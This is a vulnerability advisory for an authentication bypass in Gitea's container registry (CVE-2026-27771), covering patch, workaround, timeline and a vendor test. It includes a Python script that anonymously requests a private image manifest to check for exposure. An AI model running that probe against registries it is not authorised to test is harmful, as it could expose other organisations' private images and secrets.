CVE-2026-27771
Gitea Container Registry Authentication Bypass Vulnerability
Gitea contains a high-severity authentication bypass vulnerability affecting the built-in container and package registry functionality. CVE-2026-27771 allows unauthenticated remote attackers to retrieve private container images and package artifacts without valid credentials due to missing access control enforcement in OCI-backed registry requests. The vulnerability impacts self-hosted Gitea deployments prior to version 1.26.2 and is particularly dangerous for organizations storing proprietary code, internal dependencies, credentials, or build artifacts within private registries.
Technical Details
Gitea is a self-hosted Git service that includes built-in package and container registry functionality supporting formats such as Composer, npm, Maven, and OCI-compatible container images.
CVE-2026-27771 stems from a permission check failure in the handling of package source and registry requests. The vulnerable implementation fails to properly enforce authentication and authorization controls when serving private OCI-backed container artifacts.
An unauthenticated attacker can issue the same manifest and blob requests that docker pull or any OCI client sends directly against the registry API and retrieve container images marked as private, with no credentials, no token, and no prior access to the owning account or organization.
Successful exploitation may expose:
- Proprietary source code
- Internal build artifacts
- Secrets embedded in containers
- Infrastructure configuration data
- Private dependencies
- Software supply chain components
The vulnerability carries a CVSS base score of 8.2 (High) and represents a significant software supply chain exposure for organizations relying on self-hosted Gitea environments: anything that can be pulled from the registry anonymously can be inspected offline for secrets and reused or rehosted by the attacker.
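The following is an added example, not code from this advisory or from the Gitea project, showing how to check a single instance for the exposure described above using only the standard client side of an OCI pull: the anonymous Bearer token challenge from the Docker/OCI distribution API, followed by a manifest request for an image you already know is private. The host name, owner, image name and tag are placeholders you must replace; the realm and service values are taken from the registry's own WWW-Authenticate header rather than assumed. A 200 on a known-private manifest means the image is served to anonymous clients; a 401, 403 or 404 means the registry refused the anonymous request.

```python
"""Anonymous OCI pull probe for a self-hosted Gitea container registry.

Added example, not code from the advisory or from Gitea. It performs only
the read requests a normal `docker pull` makes and reports whether a
manifest for an image you know to be private is returned without credentials.
"""
import json
import re
import urllib.error
import urllib.parse
import urllib.request

# Placeholders (assumed values, not taken from the advisory): replace them.
BASE_URL = "https://gitea.example.com"
OWNER, IMAGE, TAG = "acme", "internal-service", "latest"

# Accept header a registry client sends for manifests (OCI and Docker v2 types).
MANIFEST_TYPES = ", ".join([
    "application/vnd.oci.image.manifest.v1+json",
    "application/vnd.oci.image.index.v1+json",
    "application/vnd.docker.distribution.manifest.v2+json",
    "application/vnd.docker.distribution.manifest.list.v2+json",
])


def parse_bearer_challenge(header):
    """Parse 'Bearer realm="...",service="...",scope="..."' into a dict.

    Returns None when the header is missing or is not a Bearer challenge.
    """
    if not header or not header.lower().startswith("bearer "):
        return None
    return dict(re.findall(r'(\w+)="([^"]*)"', header[len("Bearer "):]))


def token_url(challenge, owner, image):
    """Build the anonymous token request URL from the parsed challenge.

    The scope format (repository:<name>:pull) is the Docker token-auth
    convention that docker pull itself uses.
    """
    params = {"scope": f"repository:{owner}/{image}:pull"}
    if challenge.get("service"):
        params["service"] = challenge["service"]
    return challenge["realm"] + "?" + urllib.parse.urlencode(params)


def classify(status):
    """Turn the status of the anonymous manifest request into a verdict."""
    if status == 200:
        return "EXPOSED: private manifest served to an anonymous client"
    if status in (401, 403):
        return "protected: registry denied the anonymous request"
    if status == 404:
        return "protected: image not visible anonymously (or the name is wrong)"
    return f"unexpected status {status}"


def fetch(url, headers=None):
    """GET url; return (status, headers, body) without raising on HTTP errors."""
    req = urllib.request.Request(url, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, resp.headers, resp.read()
    except urllib.error.HTTPError as e:
        return e.code, e.headers, e.read()


def probe(base_url, owner, image, tag):
    """Run the anonymous pull flow against one registry; return the verdict."""
    auth = {}
    status, hdrs, _ = fetch(f"{base_url}/v2/")
    challenge = parse_bearer_challenge(hdrs.get("WWW-Authenticate"))
    if status == 401 and challenge and "realm" in challenge:
        # Ask the realm for an anonymous (credential-less) token, as a client does.
        tstatus, _, body = fetch(token_url(challenge, owner, image))
        if tstatus == 200:
            tok = json.loads(body).get("token") or json.loads(body).get("access_token")
            if tok:
                auth = {"Authorization": f"Bearer {tok}"}
    mstatus, _, _ = fetch(f"{base_url}/v2/{owner}/{image}/manifests/{tag}",
                          {"Accept": MANIFEST_TYPES, **auth})
    return classify(mstatus)


if __name__ == "__main__":
    print(probe(BASE_URL, OWNER, IMAGE, TAG))
```

Run it before patching to record the baseline and again after the upgrade (or after enabling the workaround below) to confirm the manifest request is refused. Because only a manifest is requested, no layer data is downloaded, and the check is safe to run repeatedly against production.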
NodeZero® Proactive Security Platform — Rapid Response
A NodeZero Rapid Response test has been developed to safely validate whether this authentication bypass can be exploited in your environment. The test executes real attack techniques without causing damage, giving teams immediate clarity on exposure.
- Run the Rapid Response test: Launch from the NodeZero platform to determine whether private container images and registry artifacts can be accessed without authentication
- Patch immediately: Upgrade affected Gitea instances to version 1.26.2 or later
- Re-run the test: Confirm the vulnerability is no longer exploitable after remediation
Affected versions & patch
- Affected: Gitea versions prior to 1.26.2 using the built-in package or container registry functionality
- Patch: Upgrade to Gitea 1.26.2 or later, which introduces the missing permission checks and properly enforces private/internal package visibility restrictions
Temporary workaround
If immediate patching is not possible, require sign-in for the whole instance by setting the following in app.ini (Gitea's documentation refers to this key as [service].REQUIRE_SIGNIN_VIEW) and restarting Gitea:

    [service]
    REQUIRE_SIGNIN_VIEW = true

This forces every page and API request, registry pulls included, to be authenticated until the upgrade can be completed. Be aware of the trade-off: the setting also blocks anonymous access to public repositories and public packages on the instance, so plan for that if you serve public content. After the restart, confirm it took effect by attempting an anonymous pull of a known-private image; the registry should refuse it.
Timeline
- May 20, 2026: Gitea 1.26.2 was released with the fix for the missing package/registry permission checks.
- May 21, 2026: CVE-2026-27771 was published/reserved in vulnerability tracking sources.
- May 27, 2026: Public reporting detailed the broader exposure, including claims that 30,000+ Gitea deployments may have exposed private container images.
- May 29, 2026: NodeZero Rapid Response test made available to help customers validate exploitability and remediation status.